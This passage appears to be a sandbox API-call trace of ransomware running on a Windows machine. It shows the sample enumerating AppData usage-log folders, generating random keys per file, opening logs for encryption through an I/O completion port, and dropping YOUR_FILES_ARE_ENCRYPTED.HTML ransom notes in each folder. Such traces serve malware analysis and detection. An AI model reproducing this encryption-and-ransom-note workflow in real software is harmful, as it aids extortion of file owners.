pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs") returned 68 [0110.919] GetProcessHeap () returned 0x600000 [0110.919] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30d81a8 [0110.920] lstrcpyW (in: lpString1=0x30d81a8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs" [0110.920] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs\\*" [0110.920] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5b2eec3b, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x5b2eec3b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x5b2eec3b, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d4c6, dwReserved1=0x63d450, cFileName=".", cAlternateFileName="")) returned 0x626778 [0110.920] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5b2eec3b, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x5b2eec3b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x5b2eec3b, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d4c6, dwReserved1=0x63d450, cFileName="..", cAlternateFileName="")) returned 1 [0110.920] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b2eec3b, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x5b2eec3b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x556a431, ftLastWriteTime.dwHighDateTime=0x1d705f0, nFileSizeHigh=0x0, nFileSizeLow=0x110c, dwReserved0=0x63d4c6, dwReserved1=0x63d450, cFileName="powershell.exe.log", cAlternateFileName="POWERS~1.LOG")) returned 1 [0110.920] StrStrIW (lpFirst="powershell.exe.log", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.921] wnsprintfW (in: pszDest=0x30d81a8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs\\powershell.exe.log") returned 87 [0110.921] PathFindExtensionW (pszPath="powershell.exe.log") returned=".log" [0110.921] lstrlenW (lpString=".log") returned 4 [0110.921] PathFindExtensionW (pszPath="powershell.exe.log") returned=".log" [0110.921] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0110.921] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs\\powershell.exe.log" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\clr_v4.0\\usagelogs\\powershell.exe.log"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x320 [0110.921] GetFileSizeEx (in: hFile=0x320, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=4364) returned 1 [0110.921] GetProcessHeap () returned 0x600000 [0110.921] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x660338 [0110.924] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="BC") returned 2 [0110.924] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="1F") returned 2 [0110.924] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="46") returned 2 [0110.924] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="AE") returned 2 [0110.924] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="79") returned 2 [0110.924] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="D3") returned 2 [0110.924] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="D8") returned 2 [0110.924] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="5C") returned 2 [0110.924] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="CE") returned 2 [0110.924] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="7C") returned 2 [0110.924] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="DF") returned 2 [0110.924] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="85") returned 2 [0110.924] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="CB") returned 2 [0110.924] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="D0") returned 2 [0110.924] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="C5") returned 2 [0110.924] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="13") returned 2 [0110.924] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="75") returned 2 [0110.924] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="A5") returned 2 [0110.924] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="36") returned 2 [0110.924] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="C8") returned 2 [0110.924] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="D6") returned 2 [0110.924] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="49") returned 2 [0110.924] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="4B") returned 2 [0110.924] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="A9") returned 2 [0110.924] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="2F") returned 2 [0110.924] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="54") returned 2 [0110.924] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="B9") returned 2 [0110.925] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="A3") returned 2 [0110.925] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="16") returned 2 [0110.925] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="D4") returned 2 [0110.925] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="BD") returned 2 [0110.925] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="53") returned 2 [0110.925] lstrcpyW (in: lpString1=0x6703ec, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs\\powershell.exe.log" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs\\powershell.exe.log") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs\\powershell.exe.log" [0110.925] CreateIoCompletionPort (FileHandle=0x320, ExistingCompletionPort=0x274, CompletionKey=0x660338, NumberOfConcurrentThreads=0x0) returned 0x274 [0110.925] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x660338, lpOverlapped=0x660338) returned 1 [0110.925] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b2eec3b, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x5b2eec3b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x556a431, ftLastWriteTime.dwHighDateTime=0x1d705f0, nFileSizeHigh=0x0, nFileSizeLow=0x110c, dwReserved0=0x63d4c6, dwReserved1=0x63d450, cFileName="powershell.exe.log", cAlternateFileName="POWERS~1.LOG")) returned 0 [0110.925] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0110.925] wnsprintfW (in: pszDest=0x30d81a8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 98 [0110.925] GetProcessHeap () returned 0x600000 [0110.925] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.926] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\clr_v4.0\\usagelogs\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0110.926] WriteFile (in: hFile=0x31c, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0110.927] CloseHandle (hObject=0x31c) returned 1 [0110.927] GetProcessHeap () returned 0x600000 [0110.927] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.927] GetProcessHeap () returned 0x600000 [0110.927] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30d81a8 | out: hHeap=0x600000) returned 1 [0110.927] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5b2eec3b, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x5b2eec3b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x5b2eec3b, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="UsageLogs", cAlternateFileName="USAGEL~1")) returned 0 [0110.927] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0110.928] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\CLR_v4.0\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 88 [0110.928] GetProcessHeap () returned 0x600000 [0110.928] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.928] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\CLR_v4.0\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\clr_v4.0\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x310 [0110.928] WriteFile (in: hFile=0x310, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0110.929] CloseHandle (hObject=0x310) returned 1 [0110.929] GetProcessHeap () returned 0x600000 [0110.929] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.929] GetProcessHeap () returned 0x600000 [0110.929] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30c81a0 | out: hHeap=0x600000) returned 1 [0110.931] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x73c78cc8, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x73c78cc8, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x73c78cc8, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="CLR_v4.0_32", cAlternateFileName="CLR_V4~1.0_3")) returned 1 [0110.931] StrStrIW (lpFirst="CLR_v4.0_32", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.931] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\CLR_v4.0_32") returned 61 [0110.931] GetProcessHeap () returned 0x600000 [0110.931] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30c81a0 [0110.932] lstrcpyW (in: lpString1=0x30c81a0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\CLR_v4.0_32" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\CLR_v4.0_32") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\CLR_v4.0_32" [0110.932] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\CLR_v4.0_32", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\CLR_v4.0_32\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\CLR_v4.0_32\\*" [0110.932] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\CLR_v4.0_32\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x73c78cc8, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x73c78cc8, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x73c78cc8, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x626778 [0110.932] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x73c78cc8, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x73c78cc8, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x73c78cc8, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0110.932] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x73c78cc8, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x73c78cc8, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x73c78cc8, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="UsageLogs", cAlternateFileName="USAGEL~1")) returned 1 [0110.932] StrStrIW (lpFirst="UsageLogs", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.932] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\CLR_v4.0_32\\UsageLogs") returned 71 [0110.932] GetProcessHeap () returned 0x600000 [0110.932] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30d81a8 [0110.933] lstrcpyW (in: lpString1=0x30d81a8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\CLR_v4.0_32\\UsageLogs" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\CLR_v4.0_32\\UsageLogs") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\CLR_v4.0_32\\UsageLogs" [0110.933] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\CLR_v4.0_32\\UsageLogs", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\CLR_v4.0_32\\UsageLogs\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\CLR_v4.0_32\\UsageLogs\\*" [0110.987] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\CLR_v4.0_32\\UsageLogs\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x73c78cc8, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x73c78cc8, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x73c78cc8, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d4cc, dwReserved1=0x63d450, cFileName=".", cAlternateFileName="")) returned 0x626638 [0110.989] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x73c78cc8, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x73c78cc8, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x73c78cc8, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d4cc, dwReserved1=0x63d450, cFileName="..", cAlternateFileName="")) returned 1 [0110.989] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73c78cc8, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x73c78cc8, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x8296f83, ftLastWriteTime.dwHighDateTime=0x1d705f0, nFileSizeHigh=0x0, nFileSizeLow=0x1078, dwReserved0=0x63d4cc, dwReserved1=0x63d450, cFileName="powershell.exe.log", cAlternateFileName="POWERS~1.LOG")) returned 1 [0110.989] StrStrIW (lpFirst="powershell.exe.log", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.989] wnsprintfW (in: pszDest=0x30d81a8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\CLR_v4.0_32\\UsageLogs\\powershell.exe.log") returned 90 [0110.989] PathFindExtensionW (pszPath="powershell.exe.log") returned=".log" [0110.989] lstrlenW (lpString=".log") returned 4 [0110.989] PathFindExtensionW (pszPath="powershell.exe.log") returned=".log" [0110.989] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0110.989] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\CLR_v4.0_32\\UsageLogs\\powershell.exe.log" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\clr_v4.0_32\\usagelogs\\powershell.exe.log"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0110.989] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=4216) returned 1 [0110.989] GetProcessHeap () returned 0x600000 [0110.989] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x313b008 [0110.992] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="85") returned 2 [0110.992] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="86") returned 2 [0110.992] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="48") returned 2 [0110.992] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="C8") returned 2 [0110.992] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="C4") returned 2 [0110.992] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="DB") returned 2 [0110.992] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="1B") returned 2 [0110.992] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="F3") returned 2 [0110.992] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="E6") returned 2 [0110.992] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="24") returned 2 [0110.992] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="4D") returned 2 [0110.992] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="3C") returned 2 [0110.992] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="56") returned 2 [0110.992] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="20") returned 2 [0110.992] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="F0") returned 2 [0110.992] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="25") returned 2 [0110.992] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="60") returned 2 [0110.993] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="CD") returned 2 [0110.993] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="C7") returned 2 [0110.993] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="06") returned 2 [0110.993] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="E5") returned 2 [0110.993] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="AD") returned 2 [0110.993] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="53") returned 2 [0110.993] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="FA") returned 2 [0110.993] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="4B") returned 2 [0110.993] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="ED") returned 2 [0110.993] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="6A") returned 2 [0110.993] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="CC") returned 2 [0110.993] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="27") returned 2 [0110.993] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="C6") returned 2 [0110.993] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="C1") returned 2 [0110.993] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="5F") returned 2 [0110.994] lstrcpyW (in: lpString1=0x314b0bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\CLR_v4.0_32\\UsageLogs\\powershell.exe.log" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\CLR_v4.0_32\\UsageLogs\\powershell.exe.log") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\CLR_v4.0_32\\UsageLogs\\powershell.exe.log" [0110.994] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x313b008, NumberOfConcurrentThreads=0x0) returned 0x274 [0110.994] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x313b008, lpOverlapped=0x313b008) returned 1 [0110.994] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73c78cc8, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x73c78cc8, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x8296f83, ftLastWriteTime.dwHighDateTime=0x1d705f0, nFileSizeHigh=0x0, nFileSizeLow=0x1078, dwReserved0=0x63d4cc, dwReserved1=0x63d450, cFileName="powershell.exe.log", cAlternateFileName="POWERS~1.LOG")) returned 0 [0110.994] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0110.994] wnsprintfW (in: pszDest=0x30d81a8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\CLR_v4.0_32\\UsageLogs\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 101 [0110.994] GetProcessHeap () returned 0x600000 [0110.994] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.994] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\CLR_v4.0_32\\UsageLogs\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\clr_v4.0_32\\usagelogs\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0110.995] WriteFile (in: hFile=0x308, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0110.996] CloseHandle (hObject=0x308) returned 1 [0110.996] GetProcessHeap () returned 0x600000 [0110.996] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.996] GetProcessHeap () returned 0x600000 [0110.996] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30d81a8 | out: hHeap=0x600000) returned 1 [0110.996] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x73c78cc8, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x73c78cc8, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x73c78cc8, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="UsageLogs", cAlternateFileName="USAGEL~1")) returned 0 [0110.997] FindClose (in: hFindFile=0x626778 | out: 